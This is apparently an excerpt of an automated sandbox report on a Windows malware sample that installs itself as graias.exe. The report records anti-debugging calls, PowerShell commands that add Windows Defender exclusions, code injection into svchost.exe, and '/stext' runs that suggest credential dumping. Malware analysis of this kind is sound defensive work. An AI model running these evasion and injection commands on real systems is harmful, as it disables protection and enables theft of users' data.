                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_10004AB4 mov eax, dword ptr fs:[00000030h]8_2_10004AB4
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0044E93E GetProcessHeap,5_2_0044E93E
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess token adjusted: Debug
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00434178 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_00434178
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_0043A66D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0043A66D
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00433B54 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_00433B54
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00433CE7 SetUnhandledExceptionFilter,5_2_00433CE7
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_100060E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_100060E2
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_10002639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_10002639
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeCode function: 8_2_10002B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_10002B1C
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeMemory written: C:\Users\user\Desktop\iGhDjzEiDU.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Users\user\AppData\Roaming\Graias\graias.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\Graias\graias.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\Graias\graias.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Users\user\AppData\Roaming\Graias\graias.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Writes to foreign memory regions
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2818008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 26D6008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2DBB008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 257D008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 24A2008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 25E3008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E36008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2E89008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 266A008
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe5_2_00410F36
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00418764 mouse_event,5_2_00418764
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\iGhDjzEiDU.exe"Jump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"Jump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Users\user\Desktop\iGhDjzEiDU.exe "C:\Users\user\Desktop\iGhDjzEiDU.exe"Jump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\dxdiag.exe "C:\Windows\System32\dxdiag.exe" /t C:\Users\user\AppData\Local\Temp\sysinfo.txt
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\epwvcdsubpgsncdkmqhibndmvhurqgg"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\orbocvcopxyxxqzovbukeapdendakrxtoq"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe C:\Users\user\AppData\Roaming\Graias\graias.exe /stext "C:\Users\user\AppData\Local\Temp\rlggdon"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\xyepttayrhgkznkxmawzcpzmosukc.vbs"
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: logs.dat.8.drBinary or memory string: [2025/01/03 18:02:24 Program Manager]
                Source: logs.dat.8.drBinary or memory string: [2025/01/03 18:03:45 Program Manager]
                Source: logs.dat.8.drBinary or memory string: [2025/01/03 18:02:45 Program Manager]
                Source: graias.exe, 00000008.00000002.2395821295.00000000011E7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: 5_2_00433E1A cpuid 5_2_00433E1A
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: GetLocaleInfoW,5_2_004510CA
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: EnumSystemLocalesW,5_2_004470BE
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_004511F3
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: GetLocaleInfoW,5_2_004512FA
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_004513C7
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: GetLocaleInfoW,5_2_004475A7
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: GetLocaleInfoA,5_2_0040E679
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_00450A8F
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: EnumSystemLocalesW,5_2_00450D52
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: EnumSystemLocalesW,5_2_00450D07
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: EnumSystemLocalesW,5_2_00450DED
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_00450E7A
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Users\user\Desktop\iGhDjzEiDU.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\iGhDjzEiDU.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
